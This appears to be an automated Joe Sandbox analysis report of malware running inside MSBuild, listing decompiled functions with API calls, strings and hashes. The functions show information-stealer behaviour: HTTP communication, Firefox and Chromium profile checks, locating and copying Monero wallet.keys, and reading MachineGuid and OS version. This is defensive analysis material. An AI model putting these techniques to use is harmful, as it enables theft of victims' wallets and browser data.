Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: |+A
API String ID: 2507841554-3573662793
Opcode ID: 17d7d2db07836f1383ebe42077eed33d7472a458e8ab8fc12e01afd76295067f
Instruction ID: 8ad31f5b3404bc28a600bea18357ba0eabf7658113efb1b02c69fc2d70e6146f
Opcode Fuzzy Hash: 17d7d2db07836f1383ebe42077eed33d7472a458e8ab8fc12e01afd76295067f
Instruction Fuzzy Hash: 98412CB1900128ABDF30AB21DD49BDA7BB9EF04305F1040B6FB09B21A1D6359E958F98

Function 00416908 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041695C
lstrlenA.KERNEL32(?), ref: 00416967

Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C

StrStrA.SHLWAPI(00000000,?), ref: 0041697C
lstrlenA.KERNEL32(?), ref: 0041698B
lstrlenA.KERNEL32(00000000), ref: 004169A4

Strings

ERROR, xrefs: 00416956
ERROR, xrefs: 004169C7
ERROR, xrefs: 004169AF
ERROR, xrefs: 004169C0
ERROR, xrefs: 004169B9

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: f887cb261d33ec5846172d6c73cf3feedaa6bcdfe2d93480eb1dd802fa96c758
Instruction ID: 4712dda684cdb8c2e2171393cba04d1fb179912ddf7bf229b407c8c660ac4956
Opcode Fuzzy Hash: f887cb261d33ec5846172d6c73cf3feedaa6bcdfe2d93480eb1dd802fa96c758
Instruction Fuzzy Hash: 1621B6B1910215ABCB10BF35DC469DE7BA9AF04304F11502BF905E3192DB7DDA858B9D

Function 0040EA91 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EACE
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB2B
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EDF2
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC08

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECB8
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED15

Strings

firefox, xrefs: 0040EDEC
Stable\, xrefs: 0040EB46
Stable\, xrefs: 0040ED30

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: 71f79a47f0d979228e072dae5de44d2ccae310029a8badad8e422ef6d8be0663
Instruction ID: 47194a26f9b8e0096c1e3e694baa9a640fb112bc8662c66d582230df9716c17b
Opcode Fuzzy Hash: 71f79a47f0d979228e072dae5de44d2ccae310029a8badad8e422ef6d8be0663
Instruction Fuzzy Hash: 2AB1A032E00109ABCF20FFAADD47B8D7771AF40314F554126FD04B7291DA78AA998BD9

Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 00401C9D

Part of subcall function 00417023: CreateThread.KERNEL32(00000000,00000000,00416F52,?,00000000,00000000), ref: 004170C2
Part of subcall function 00417023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004170CA

Strings

.keys, xrefs: 00401B0D
\Monero\wallet.keys, xrefs: 00401B2F

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 615783205-3586502688
Opcode ID: 6e49362d96dd181217f971dbbe34428858eccf757a7ce2773a31cc932749f974
Instruction ID: 5ae5b35c92150cf6758aa8f6336e1c2bb874dddc698008119f67804e2648740c
Opcode Fuzzy Hash: 6e49362d96dd181217f971dbbe34428858eccf757a7ce2773a31cc932749f974
Instruction Fuzzy Hash: 5851FAB1E5012D9BCB21FB25DD466DD7779AF04308F5050BAA608B3192DA78AFC98F48

Function 0040FB02 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB27
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB53
_memset.LIBCMT ref: 0040FB96
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FCEC

Part of subcall function 0040F005: _memmove.LIBCMT ref: 0040F01F

Strings

N0ZWFt, xrefs: 0040FC53

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: c67993bee4912438e36ddfb868353541a33a27fc9569f7a65c4c7545ff9be8ed
Instruction ID: 39d438bcdc7af30863709b7b9b8cc218f182961c435488cec62555061f0cc539
Opcode Fuzzy Hash: c67993bee4912438e36ddfb868353541a33a27fc9569f7a65c4c7545ff9be8ed
Instruction Fuzzy Hash: BC5182B1D0022C9BDB309F14DC85AEDB7B9AB44304F4001FAA609B7592DB796E88CF59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040EC91,?,?,?,?,0040E72B,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034

Strings

+@, xrefs: 00408042

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: +@
API String ID: 2311089104-396005422
Opcode ID: d2fff167fb3d7733026eac0e62b508efa91648d8dc83ae773f2aa49c1a23bce4
Instruction ID: 807723f2e51248c8f2f98e616b696bb7d0540dc5137f9c813bae56d6ea2df898
Opcode Fuzzy Hash: d2fff167fb3d7733026eac0e62b508efa91648d8dc83ae773f2aa49c1a23bce4
Instruction Fuzzy Hash: 38115B70900204EFDF25DFA4DD88EAF7BB9EB48741F20056AF481B6290DB769A85DB11

Function 004115A9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004115DC
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 004115FB
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00411620
RegCloseKey.ADVAPI32(?,?,?,?), ref: 0041162C
CharToOemA.USER32(?,?), ref: 00411640

Strings

MachineGuid, xrefs: 00411615
SOFTWARE\Microsoft\Cryptography, xrefs: 004115F1

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: ac0312e4a16f5c84db9c78dd69df8dd05989f9bc5e5da3204268fcfd553a230b
Instruction ID: 36d3e24e9a3c9893a7224b16b4e86cd110dbf3b96fcd7bd748dfe1e958ccf2a5
Opcode Fuzzy Hash: ac0312e4a16f5c84db9c78dd69df8dd05989f9bc5e5da3204268fcfd553a230b
Instruction Fuzzy Hash: 58111BB590021DAFEB10DF60DD89EEAB7BCEB18305F4041E6A659A2062D6759F888F14

Function 00401A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD

Strings

wallet_path, xrefs: 00401A9C
SOFTWARE\monero-project\monero-core, xrefs: 00401A7F

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: 71e2f133df7caf5fe32bda60e4b65359036da6bd26fdc34318154bfdd9f678d0
Instruction ID: d4273c4a7cb626c890d84f55efe41ac35ab9d91420973d429eaa00c9153a3761
Opcode Fuzzy Hash: 71e2f133df7caf5fe32bda60e4b65359036da6bd26fdc34318154bfdd9f678d0
Instruction Fuzzy Hash: A4F05E76780304FFFB14DB90DC0EFAE7A7DEB44B02F241165B601A61E0D6B2AB409A24

Function 00415E39 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415EC8

Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2

lstrcatA.KERNEL32(?,00000000), ref: 00415EE5
lstrcatA.KERNEL32(?,?), ref: 00415F04
lstrcatA.KERNEL32(?,?), ref: 00415F18
lstrcatA.KERNEL32(?), ref: 00415F2B
lstrcatA.KERNEL32(?,?), ref: 00415F3F
lstrcatA.KERNEL32(?), ref: 00415F52

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E

Part of subcall function 00415B4D: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B72
Part of subcall function 00415B4D: HeapAlloc.KERNEL32(00000000), ref: 00415B79
Part of subcall function 00415B4D: wsprintfA.USER32 ref: 00415B92
Part of subcall function 00415B4D: FindFirstFileA.KERNEL32(?,?), ref: 00415BA9
Part of subcall function 00415B4D: StrCmpCA.SHLWAPI(?,00436AA0), ref: 00415BCA
Part of subcall function 00415B4D: StrCmpCA.SHLWAPI(?,00436AA4), ref: 00415BE4
Part of subcall function 00415B4D: wsprintfA.USER32 ref: 00415C0B
Part of subcall function 00415B4D: CopyFileA.KERNEL32(?,?,00000001), ref: 00415CC8
Part of subcall function 00415B4D: DeleteFileA.KERNEL32(?), ref: 00415CEB

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 1546541418-0
Opcode ID: b450ee3bcaab7e19ce5f631b6fe2a2ed8677c9dc5581557dff5c9454af115042
Instruction ID: a3bbb2234bca5b232b31865bed361f315e6cfb8f356f745c5661df9699e90797
Opcode Fuzzy Hash: b450ee3bcaab7e19ce5f631b6fe2a2ed8677c9dc5581557dff5c9454af115042
Instruction Fuzzy Hash: 4B51FDB1A0011C9BCF64DB64DC85ADDB7F9AB4C311F4044EAF609E3260EA35ABC98F54

Function 00410B05 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B19
HeapAlloc.KERNEL32(00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B20
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B4E
RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B6A
RegCloseKey.ADVAPI32(00436890,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B73

Strings

Windows 11, xrefs: 00410B31

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: eff4407981480f29a3e8c3abb8119370cc6538536529693400870beae5f7a9d1
Instruction ID: 0bec989384f0a7c66584ec76c5164b6df09d4e667c826edd8b17caab73b46526
Opcode Fuzzy Hash: eff4407981480f29a3e8c3abb8119370cc6538536529693400870beae5f7a9d1
Instruction Fuzzy Hash: 49F04475600304FBEF149BD1DC4EFAE7A6EEB44705F141055B601961E0D7B5AA80D725

Function 00410B7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B92
HeapAlloc.KERNEL32(00000000,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B99
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410BB7
RegQueryValueExA.KERNEL32(00436890,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ), ref: 00410BD2
RegCloseKey.ADVAPI32(00436890,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410BDB

Strings

CurrentBuildNumber, xrefs: 00410BCA

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 3182c4627f195be221e76e344ca264d351bdd3646ceab104d6e5169a5afc3c7d
Instruction ID: 16525d27e18a6f6eb50ada141e8e48f6afa079728c5f11f74ebe8399e0be2e3b
Opcode Fuzzy Hash: 3182c4627f195be221e76e344ca264d351bdd3646ceab104d6e5169a5afc3c7d
Instruction Fuzzy Hash: B4F09071640304FBFF149B91DC0FFAE7A7EEB44B06F140059F701A50A0D6B2AB809B14

Function 004156AF Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156E4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 00415704
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 0041572A
